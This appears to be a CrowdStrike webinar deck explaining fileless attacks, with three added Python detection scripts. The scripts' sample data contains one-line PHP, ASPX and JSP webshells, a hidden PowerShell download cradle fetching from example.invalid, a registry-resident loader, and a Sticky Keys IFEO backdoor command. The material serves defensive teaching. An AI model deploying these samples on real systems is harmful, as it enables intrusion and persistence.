2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHO NEEDS MALWARE?
UNDERSTANDING FILELESS ATTACKS AND HOW TO STOP THEM
1 What are fileless attacks
2 How does a fileless attack work
3 Real world examples
4 Why traditional approaches don’t work
5 The CrowdStrike approach
POLL QUESTION
HOW WOULD YOU RATE YOUR KNOWLEDGE OF FILELESS ATTACKS, 1 TO 5 (1 = NONE, 5 = EXPERT)?
WHAT IS A FILELESS ATTACK
An attack that does not require a malicious executable file to be written to disk. The attacker instead runs code in memory, in scripts, in the registry, or through legitimate system tools that are already present on the host.
THE REALITY OF FILELESS ATTACKS
§ Fileless techniques are not new
§ More prevalent than ransomware: 24% vs. 21%
§ 78% of organizations are concerned about fileless attacks
§ Only 51% of breaches include malware (source: Verizon DBIR 2017)
§ Not all attacks are 100% fileless
§ 80% of attacks use some fileless techniques (source: CrowdStrike Incident Response)
FILELESS ATTACK TECHNIQUES
FILELESS TECHNIQUES
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM
§ Spear phishing for credentials
§ Lateral movement using 'living off the land' tools (WMI, Unix commands, PowerShell)
§ Registry persistence
§ Webshells
WEBSHELL ATTACKS
1. Attacker identifies an organization with a vulnerable web application
2. Remote attacker uses SQL injection or another vulnerability to drop the payload
3. The vulnerable web server is compromised and becomes a backdoor
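A webshell is a script dropped into the web root, so one practical check alongside behavioural monitoring is a content scan of the web root for scripts that pass request input straight to eval or a shell. The example below is added here; it is not code from the deck or from any CrowdStrike product. The rule set is an illustrative starting point, not an exhaustive signature list, and the sample files are constructed for this example in the one-line style of China Chopper-type shells.

```python
"""Scan web-root files for one-line webshells that execute request input.

Added example, not part of the original deck. RULES and SAMPLE_FILES are
assumptions made for this illustration.
"""
import re

# Each rule: a name and a regex that matches "execute whatever the request sent".
RULES = [
    ("php_eval_of_request",
     re.compile(r"\b(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php_shell_exec_of_request",
     re.compile(r"\b(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
    ("asp_eval_of_request",
     re.compile(r"\b(?:eval|execute)\s*\(\s*Request(?:\.Item|\.Form|\.QueryString)?\s*[\[(]", re.I)),
    ("jsp_exec_of_request",
     re.compile(r"getRuntime\(\)\s*\.\s*exec\s*\(\s*request\.getParameter", re.I)),
]


def scan_content(content: str) -> list:
    """Return the names of every rule that matches one file's text."""
    return [name for name, rx in RULES if rx.search(content)]


def scan_tree(files: dict) -> list:
    """files maps relative path -> file text; returns [(path, rule), ...] for each match."""
    hits = []
    for path, content in files.items():
        for rule in scan_content(content):
            hits.append((path, rule))
    return hits


# Constructed sample web root: three China Chopper-style one-liners and one benign page
# that reads request input but only echoes it back escaped.
SAMPLE_FILES = {
    "uploads/img.php": "<?php @eval($_POST['pw']); ?>",
    "aspnet_client/s.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>',
    "cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("c")); %>',
    "contact.php": "<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>",
}

if __name__ == "__main__":
    for path, rule in scan_tree(SAMPLE_FILES):
        print(f"{path}: {rule}")
```

To run this against a real web root, walk the directory with `os.walk`, read each script file as text and feed the mapping to `scan_tree`; short files (a few hundred bytes) that hit any rule deserve immediate attention, because legitimate application code almost never evaluates raw request parameters.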
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM (CONTINUED)
§ PowerShell-based credential dumpers
HOW A FILELESS ATTACK TAKES PLACE
Each stage lists the attacker's goal, the tool used and the technique.

1. INITIAL COMPROMISE
   Goal: Gain access
   Tool: Webshell
   Technique: Remote access to a system using a web browser. Can be a web scripting language, e.g. China Chopper.
2. COMMAND AND CONTROL
   Goal: Recon
   Tools: systeminfo, whoami
   Technique: Run system commands to find out where we are.
3. PRIVILEGE ESCALATION
   Goal: Dump credentials
   Tool: PowerShell
   Technique: Run a PowerShell script such as Invoke-Mimikatz (a PowerShell port of Mimikatz) to dump credentials from memory.
4. PERSISTENCE
   Goal: Maintain persistence
   Tool: Registry
   Technique: Modifies the registry to create a backdoor, e.g. through the On-Screen Keyboard or Sticky Keys accessibility binaries.
5. EXFILTRATION
   Goal: Exfiltrate data
   Tools: vssadmin, copy, net use, webshell
   Technique: Uses system tools to gather data and the China Chopper webshell to exfiltrate it.
REAL WORLD EXAMPLES
§ Fileless malware: Kovter
§ Fileless attack: nation state
KOVTER
§ Click-fraud
§ Fileless after initial infection
§ Hides encrypted malicious modules in the registry
§ Hides other malicious modules in PowerShell scripts
§ Uses a shortcut file (.lnk) to download PowerShell scripts; the script launches PowerShell to start shellcode in memory
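Because Kovter-style malware keeps its payload in the registry and launches it with a PowerShell command line, the command line recorded in process telemetry or in a Run key is often the only artifact an analyst gets. The example below is added here (it is neither Kovter code nor CrowdStrike code): it decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE) and flags the traits of a registry-resident, in-memory loader. The pattern set, the risk rule and the sample command lines are assumptions constructed for this example, not a complete signature list.

```python
"""Triage PowerShell command lines for fileless-loader traits.

Added example, not part of the original deck. PATTERNS, HIGH_RISK and SAMPLES
are assumptions constructed for this illustration.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64(UTF-16LE).
ENCODED_RX = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

PATTERNS = {
    "encoded_command":   re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":        re.compile(r"-no(?:p|profile)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "registry_read":     re.compile(r"\b(?:get-itemproperty|gp)\b|\bhk(?:cu|lm):", re.I),
    "download_cradle":   re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "memory_only_exec":  re.compile(r"frombase64string|\[reflection\.assembly\]::load|virtualalloc", re.I),
}
# Any one of these is enough to call the command line suspicious on its own.
HIGH_RISK = {"invoke_expression", "download_cradle", "memory_only_exec", "registry_read"}


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline: str) -> dict:
    """Decode, pattern-match and score one command line."""
    script = decode_encoded_command(cmdline)
    # Blank out the base64 blob so its letters cannot accidentally match a keyword.
    visible = ENCODED_RX.sub("-encodedcommand <blob>", cmdline)
    text = visible + ("\n" + script if script else "")
    findings = sorted(name for name, rx in PATTERNS.items() if rx.search(text))
    suspicious = bool(HIGH_RISK & set(findings)) or len(findings) >= 3
    return {"decoded": script, "findings": findings, "suspicious": suspicious}


# Constructed sample: a loader that reads its payload from a registry value and runs it in memory.
REGISTRY_LOADER_SCRIPT = (
    r"$p=(Get-ItemProperty 'HKCU:\Software\Example').payload; "
    r"IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"
)
SAMPLES = {
    "kovter_style_registry_loader": "powershell.exe -nop -w hidden -enc " + encode_command(REGISTRY_LOADER_SCRIPT),
    "benign_scheduled_script": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "download_cradle": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, triage(cmd))
```

Feed it the CommandLine field of process-creation events (or the data of Run-key values) and review anything marked suspicious; the decoded script is usually far more telling than the launcher itself.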
NATION STATE ATTACK
§ Weaponization: Spoofed website
§ Delivery: Spear phishing
§ PowerShell modules connect to a remote server
§ Install and run Mimikatz
§ Lateral movement through stolen credentials
MOVING LATERALLY WITHOUT MALWARE
1. Attacker sets the bait with a fake website
2. Extract credentials from the initial victim
3. Move laterally to other hosts
HOW TO PROTECT AGAINST FILELESS ATTACKS
POLL QUESTION
HOW WOULD YOU RATE YOUR CURRENT LEVEL OF PROTECTION AGAINST FILELESS ATTACKS, 1 TO 5 (1 = POOR, 5 = EXCELLENT)?
EDUCATE
83% rate the efficacy of traditional signature-based AV as good or excellent
WHY TRADITIONAL APPROACHES DON'T WORK
§ No file to analyze
§ Uses legitimate applications
§ No artifacts left behind
§ No file to detonate
§ Blind if prevention fails
§ Hands on keyboard
FALCON ENDPOINT PROTECTION
PROTECTS AGAINST ALL TYPES OF ATTACKS
§ Protect against known and unknown malware and malware-free attacks
§ Protect against zero-day attacks
CAPABILITIES
§ Machine learning
§ IOA behavioral blocking
§ Block known bad
§ Exploit mitigation
§ Endpoint detection and response
§ Managed threat hunting
INDICATORS OF ATTACK
An IOA sequence, in the order the behaviour occurs on the endpoint:
1. Web server executes a process
2. Process conducts reconnaissance
3. Process elevates privileges
4. Process injects a thread into a system process
5. Injected thread reads credentials from the system process memory
6. Dumped credentials are used to log in to the Exchange server
7. Mailboxes are exported out of Exchange
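The IOA sequence above and the five-stage attack flow earlier in the deck are both chains of ordinary-looking events that only become damning in combination: a web server spawning a child, that child running recon, a descendant opening LSASS for reading, a Debugger value set on an accessibility binary. The correlator below is an added example (not CrowdStrike Falcon code) that walks endpoint events in order, tracks which processes descend from a web server, and raises a rule for each link in that chain. The event schema, field names, allow-list and sample events are assumptions constructed for this example, loosely modelled on Sysmon-style process, process-access and registry telemetry.

```python
"""Correlate endpoint events into the fileless-attack IOA chain from the deck.

Added example, not CrowdStrike code. The Event schema, the name sets, the
LSASS reader allow-list and SAMPLE_EVENTS are assumptions for this illustration.
"""
from dataclasses import dataclass

WEB_SERVERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "php-cgi.exe"}
RECON = {"whoami.exe", "systeminfo.exe", "net.exe", "net1.exe", "ipconfig.exe",
         "nltest.exe", "quser.exe", "hostname.exe"}
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                 "magnify.exe", "displayswitch.exe"}
IFEO = "hklm\\software\\microsoft\\windows nt\\currentversion\\image file execution options\\"
PROCESS_VM_READ = 0x0010
LSASS_READERS_OK = {"csrss.exe", "wininit.exe", "lsass.exe", "msmpeng.exe"}  # assumed allow-list


@dataclass
class Event:
    kind: str          # "process" (creation), "access" (handle to another process), "registry" (value set)
    pid: int
    image: str         # image path of the acting process
    ppid: int = 0
    parent: str = ""   # process: parent image path
    cmdline: str = ""
    target: str = ""   # access: target image path; registry: key path
    value: str = ""    # registry: value name written
    access: int = 0    # access: granted access mask


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events) -> list:
    """Return [(rule, detail), ...] in the order the triggering events were seen."""
    hits = []
    chain = {}  # pid -> web server image that (transitively) spawned it
    for e in events:
        img = basename(e.image)
        if e.kind == "process":
            parent = basename(e.parent)
            if parent in WEB_SERVERS and img not in WEB_SERVERS:
                chain[e.pid] = parent
                hits.append(("web_server_executes_process", f"{parent} -> {img} [{e.cmdline}]"))
            elif e.ppid in chain:
                chain[e.pid] = chain[e.ppid]
            if e.pid in chain and img in RECON:
                hits.append(("recon_in_web_server_chain", f"{img} [{e.cmdline}]"))
            if e.pid in chain and img == "vssadmin.exe" and "create shadow" in e.cmdline.lower():
                hits.append(("shadow_copy_in_web_server_chain", e.cmdline))
        elif e.kind == "access":
            if (basename(e.target) == "lsass.exe" and e.access & PROCESS_VM_READ
                    and img not in LSASS_READERS_OK):
                rule = "credential_dump_in_web_server_chain" if e.pid in chain else "lsass_memory_read"
                hits.append((rule, f"{img} opened lsass.exe with access 0x{e.access:x}"))
        elif e.kind == "registry":
            key = e.target.lower()
            if key.startswith(IFEO) and basename(key) in ACCESSIBILITY and e.value.lower() == "debugger":
                hits.append(("accessibility_ifeo_backdoor", f"{img} set {e.target}\\{e.value}"))
    return hits


# Constructed telemetry: IIS worker -> cmd.exe -> recon, PowerShell reading LSASS,
# an IFEO Sticky Keys backdoor, a shadow copy, then two benign events.
SYS = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    Event("process", 100, SYS + r"\inetsrv\w3wp.exe", 40, SYS + r"\svchost.exe"),
    Event("process", 200, SYS + r"\cmd.exe", 100, SYS + r"\inetsrv\w3wp.exe", cmdline='cmd.exe /c "whoami & systeminfo"'),
    Event("process", 201, SYS + r"\whoami.exe", 200, SYS + r"\cmd.exe", cmdline="whoami"),
    Event("process", 202, SYS + r"\systeminfo.exe", 200, SYS + r"\cmd.exe", cmdline="systeminfo"),
    Event("process", 300, SYS + r"\WindowsPowerShell\v1.0\powershell.exe", 200, SYS + r"\cmd.exe",
          cmdline="powershell -nop -w hidden -ep bypass"),
    Event("access", 300, SYS + r"\WindowsPowerShell\v1.0\powershell.exe", target=SYS + r"\lsass.exe", access=0x1010),
    Event("process", 400, SYS + r"\reg.exe", 200, SYS + r"\cmd.exe",
          cmdline=r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d cmd.exe'),
    Event("registry", 400, SYS + r"\reg.exe",
          target=r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", value="Debugger"),
    Event("process", 500, SYS + r"\vssadmin.exe", 200, SYS + r"\cmd.exe", cmdline="vssadmin create shadow /for=C:"),
    Event("process", 600, SYS + r"\notepad.exe", 50, r"C:\Windows\explorer.exe"),
    Event("access", 700, r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe", target=SYS + r"\lsass.exe", access=0x1fffff),
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The value of keeping per-process state is that the later rules inherit context: a PowerShell process reading LSASS is worth a look anywhere, but the same read inside a process tree rooted at w3wp.exe is the deck's chain end to end, and the rule name says so.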
KEY TAKEAWAYS
§ The threat is real
§ Traditional AV is not enough
§ Current defenses do not work
§ Need to think beyond malware and focus on stopping the breach
Questions? Please submit all questions in the Q&A chat right below the presentation slides.
CONTACT US AND ADDITIONAL INFORMATION
§ Join weekly demos: crowdstrike.com/productdemos
§ Featured asset: How Adversaries Use Fileless Attacks To Evade Your Security (link in resource list)
§ Website: crowdstrike.com
§ Email: [email protected]
§ Phone: 1.888.512.8902 (US)